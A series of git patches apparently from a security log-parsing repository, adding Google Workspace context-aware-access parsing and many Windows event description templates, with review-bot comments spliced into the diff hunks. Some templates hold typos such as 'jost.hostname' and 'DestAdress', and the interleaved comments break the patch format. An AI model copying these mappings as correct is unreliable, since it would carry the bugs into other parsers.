"LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "11332867018361686666666", + "name": "john.doe" + } + } +} \ No newline at end of file From 8bcde47c77e71b93d99f114695639467987b3d16 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Thu, 14 Nov 2024 16:42:34 +0100 Subject: [PATCH 230/317] Add context access service --- Google Cloud/google-report/_meta/fields.yml | 5 ++ .../_meta/smart-descriptions.json | 18 ++++++ Google Cloud/google-report/ingest/parser.yml | 10 ++++ .../tests/test_access_sample_1.json | 58 +++++++++++++++++++ 4 files changed, 91 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_access_sample_1.json diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 84b0db0f6..4fc31cc4b 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -1,3 +1,8 @@ +google.report.access.application: + description: Application name + name: google.report.access.application + type: keyword + google.report.actor.email: description: '' name: google.report.actor.email diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 6a934ee3d..51fcc1837 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json 
@@ -168,6 +168,24 @@ } ] }, + { + "value": " Access to {google.report.access.application} was denied for {user.email} : {event.action}", + "conditions": [ + { + "field": "network.application", + "value": "context_aware_access" + }, + { + "field": "user.email" + }, + { + "field": "event.action" + }, + { + "field": "google.report.access.application" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index bd5fd0d4e..25f2888b2 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -1,4 +1,5 @@ name: google-report +ignored_values: ["UNKNOWN"] pipeline: - name: json_event external: @@ -28,6 +29,8 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "admin"}}' - name: set_vault_fields filter: '{{ json_event.message.id.applicationName == "vault"}}' + - name: set_context_aware_fields + filter: '{{ json_event.message.id.applicationName == "context_aware_access"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' @@ -258,3 +261,10 @@ stages: {%- endif -%} {% endfor %} {{ types|unique|list }} + + set_context_aware_fields: + actions: + - set: + event.type: ["denied"] + device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_DEVICE_ID" %}{{param.value}}{% endif %}{% endfor %}' + google.report.access.application: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_APPLICATION" %}{{param.value}}{% endif %}{% endfor %}' diff --git a/Google Cloud/google-report/tests/test_access_sample_1.json b/Google Cloud/google-report/tests/test_access_sample_1.json new file mode 100644 index 000000000..e83076db1 --- /dev/null +++ b/Google Cloud/google-report/tests/test_access_sample_1.json 
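Review bot: The new description string starts with a leading space and puts a space before the colon: `" Access to {google.report.access.application} was denied for {user.email} : {event.action}"`, so the rendered text begins with whitespace. Suggested value: `"Access to {google.report.access.application} was denied for {user.email}: {event.action}"`. The conditions only require `event.action` to be present, so "was denied" is asserted for every context_aware_access event with an action; if `MONITOR_MODE_ACCESS_DENY_EVENT` (the name in the fixture) means the policy ran in monitor mode without actually blocking access, the wording overstates what happened, which is worth confirming against the Google documentation before it reaches analysts.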
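Review bot: `ignored_values: ["UNKNOWN"]` is added at the top level of the parser, so it presumably applies to every field the parser sets rather than only to `device.id`; a rule name, label or other value that happens to be the literal `UNKNOWN` would then be silently dropped as well. If the engine allows it, scoping the suppression to the `device.id` set action (for example a `filter` that skips the action when the `CAA_DEVICE_ID` value is `UNKNOWN`) keeps the change limited to the field that needs it. A comment next to the setting stating why it exists would at least make the global effect visible to the next maintainer.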
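Review bot: In `set_context_aware_fields`, `event.type: ["denied"]` is set unconditionally for every context_aware_access event, so any event name that is not a deny event would still be typed as denied. The other stages in this file gate `event.type` on `json_event.message.events[0].name`; adding the same kind of filter here, e.g. `filter: '{{ json_event.message.events[0].name in ["ACCESS_DENY_EVENT", "MONITOR_MODE_ACCESS_DENY_EVENT"] }}'` with the list checked against the provider's documented event names, keeps the typing honest as new event kinds appear.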
@@ -0,0 +1,58 @@
+{
+ "input": {
+ "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}",
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Google Report",
+ "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd"
+ }
+ }
+ },
+ "expected": {
+ "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is 
admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}",
+ "event": {
+ "action": "MONITOR_MODE_ACCESS_DENY_EVENT",
+ "dataset": "admin#reports#activity",
+ "type": [
+ "denied"
+ ]
+ },
+ "@timestamp": "2024-11-07T14:23:22.470000Z",
+ "cloud": {
+ "account": {
+ "id": "C02i38lll"
+ }
+ },
+ "google": {
+ "report": {
+ "access": {
+ "application": "GMAIL"
+ },
+ "actor": {
+ "email": "john.doe@test.com"
+ }
+ }
+ },
+ "network": {
+ "application": "context_aware_access"
+ },
+ "related": {
+ "ip": [
+ "9.3.2.1"
+ ],
+ "user": [
+ "john.doe"
+ ]
+ },
+ "source": {
+ "address": "9.3.2.1",
+ "ip": "9.3.2.1"
+ },
+ "user": {
+ "domain": "test.com",
+ "email": "john.doe@test.com",
+ "id": "117564289545555555555",
+ "name": "john.doe"
+ }
+ }
+}
\ No newline at end of file
From 4f2e1bfea597d812bf2dcb478bebdc59684e770d Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Thu, 14 Nov 2024 16:57:21 +0100
Subject: [PATCH 231/317] Updated smart descriptions
---
 .../winlogbeat/_meta/smart-descriptions.json | 1129 +++++++++++++++++
 1 file changed, 1129 insertions(+)
diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json
index eb6a595a2..5eaf6dc64 100644
--- a/Beats/winlogbeat/_meta/smart-descriptions.json
+++ b/Beats/winlogbeat/_meta/smart-descriptions.json
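Review bot: The only fixture carries `CAA_DEVICE_ID` with the value `UNKNOWN`, so the expected output has no `device.id` and the `device.id` mapping added to parser.yml in this commit is never exercised; a second sample whose parameter holds a real identifier (a constructed value such as `"DEVICE-ID-PLACEHOLDER"`) and whose expected block contains `device.id` would cover both branches. The expected output also drops `CAA_DEVICE_STATE` (`No Device Signals`) and the `CAA_ACCESS_LEVEL_UNSATISFIED` list, which are the details that explain why access was refused; if leaving them unmapped is intentional, a note in the field definitions would make that explicit. The file is written without a trailing newline, unlike a typical committed JSON fixture.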
@@ -1,4 +1,1133 @@ [ + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4624 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged on to" + }, + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "connected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4624 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{action.properties.TargetUserSid} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserSid", + "target": "host.hostname", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + 
} + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "failed to log on to" + }, + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "connected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged off from {host.hostname}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged off from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4634 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {action.properties.TargetServerName} using explicit credentials", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.TargetServerName", + "type": "attempted to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4648 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {host.hostname} using explicit credentials", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "attempted to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4648 + }, + { + "field": "event.provider", + "value": 
"Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.TargetServerName", + "value": "localhost" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} accessed the object {action.properties.ObjectName} on {host.hostname}", + "relationships": [ + { + "source": "action.properties.SubjectUserName", + "target": "action.properties.ObjectName", + "type": "accessed" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4662 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "action.properties.SubjectUserName", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed {process.command_line} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "user.name", + "target": "process.parent.executable", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "jost.hostname", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.executable", + "target": "host.hostname", + "type": 
"executed on" + }, + { + "source": "process.parent.executable", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4688 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "Process {process.name} exited. It was executed by {user.domain}\\{user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.executable", + "type": "executed" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4689 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetDomainName", + "type": "created account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4720 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetDomainName", + "type": "enabled account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4722 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} changed their password on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "host.hostname", + "type": "changed their password on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4723 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + 
"value": "{user.domain}\\{user.name} failed to change their password on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "host.hostname", + "type": "failed to change their password on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4723 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{user.domain}\\{user.name} disabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "disabled account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4725 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} deleted account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "deleted account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4726 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "created group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4727 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} effectuated changes about {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + 
"type": "effectuated changes about" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4742 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created security-disabled local group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "created security-disabled local group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4744 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} effectuated changes about the security-disabled global group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "effectuated changes about" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4750 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to authenticate from {source.ip} (Error Code: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "failed to log authenticate from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4768 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} successfully authenticated from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "authenticated from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4768 + }, + { + 
"field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was denied a service ticket for {action.properties.ServiceName} from {source.ip} (Error Code: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.ServiceName", + "type": "was denied a ticket for" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4769 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was granted a service ticket for {action.properties.ServiceName} from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.ServiceName", + "type": "was granted a ticket for" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4769 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{action.properties.TargetUserName} failed to authenticate from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "failed to authenticate from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4771 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetUserName} failed to authenticate on {action.properties.Workstation} (Reason: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.Workstation", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", 
+ "value": 4776 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{action.properties.TargetUserName} successfully authenticated on {action.properties.Workstation}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.Workstation", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4776 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enumerated local groups of {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "enumerated local groups of" + } + ], + "conditions": [ + { + "field": "action.id", + 
"value": 4798 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enumerated members of local group {action.properties.TargetUserName} on {log.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "enumerated members of" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4799 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "Authenticated user {user.name} was denied the access to Remote Desktop to {log.hostname} from IP {action.properties.ClientAddress}", + "relationships": [ + { + "source": "user.name", + "target": "log.hostname", + "type": "wad denied RDP access to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4825 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "assigned a new logon to special group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4964 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} accessed network share {action.properties.ShareName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.ShareName", + "type": "accessed network share" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5140 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} failed to access network share {action.properties.ShareName} 
from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.ShareName", + "type": "failed to access network share" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5140 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{user.domain}\\{user.name} was granted access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.RelativeTargetName", + "type": "accessed shared file" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5145 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} was denied access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.RelativeTargetName", + "type": "failed to access shared file" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5145 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAdress}:{action.properties.DestPort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": 
"action.id", + "value": 4103 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "{user.id} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4104 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4104 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Started invocation of PowerShell ScriptBlock on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4105 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Completed invocation of PowerShell ScriptBlock on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4106 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Process {process.executable} created by {user.domain}\\{user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Process {process.executable} changed the 
creation time of the file {file.name} on {host.name}", + "relationships": [ + { + "source": "process.executable", + "target": "file.name", + "type": "changed creation time of" + }, + { + "source": "process.executable", + "target": "host.name", + "type": "executed on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 2 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Network connection from {source.ip} to {destination.ip}:{destination.port} by {process.executable} on {host.name}", + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 3 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "{file.name} created by {process.executable} on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 11 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Registry value {action.properties.TargetObject} created by {process.executable} on {log.hostname}", + "conditions": [ + { + "field": "action.id", + "value": 12 + }, + { + "field": "action.properties.MessEventType", + "value": "CreateValue" + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Registry key {registry.key} set by {process.executable} on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 13 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Sysmon configuration was updated on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 16 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "{host.name} performed a DNS query for name {dns.question.name} (status: {sysmon.dns.status})", + "conditions": [ + { + "field": "action.id", 
+ "value": 22
+ },
+ {
+ "field": "event.provider",
+ "value": "Microsoft-Windows-Sysmon"
+ }
+ ]
+ },
 {
 "value": "Auditing event on {winlog.computer_name}: {event.action}",
 "conditions": [
From a68dec425ee56f45f66ae948e194e23595e86436 Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Thu, 14 Nov 2024 17:44:03 +0100
Subject: [PATCH 232/317] Small fixes
---
 .../winlogbeat/_meta/smart-descriptions.json | 51 -------------------
 1 file changed, 51 deletions(-)
diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json
index 5eaf6dc64..a3b786729 100644
--- a/Beats/winlogbeat/_meta/smart-descriptions.json
+++ b/Beats/winlogbeat/_meta/smart-descriptions.json
@@ -1134,12 +1134,6 @@
 {
 "field": "winlog.provider_guid",
 "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}"
- },
- {
- "field": "winlog.computer_name"
- },
- {
- "field": "event.action"
 }
 ]
 },
@@ -1149,15 +1143,6 @@
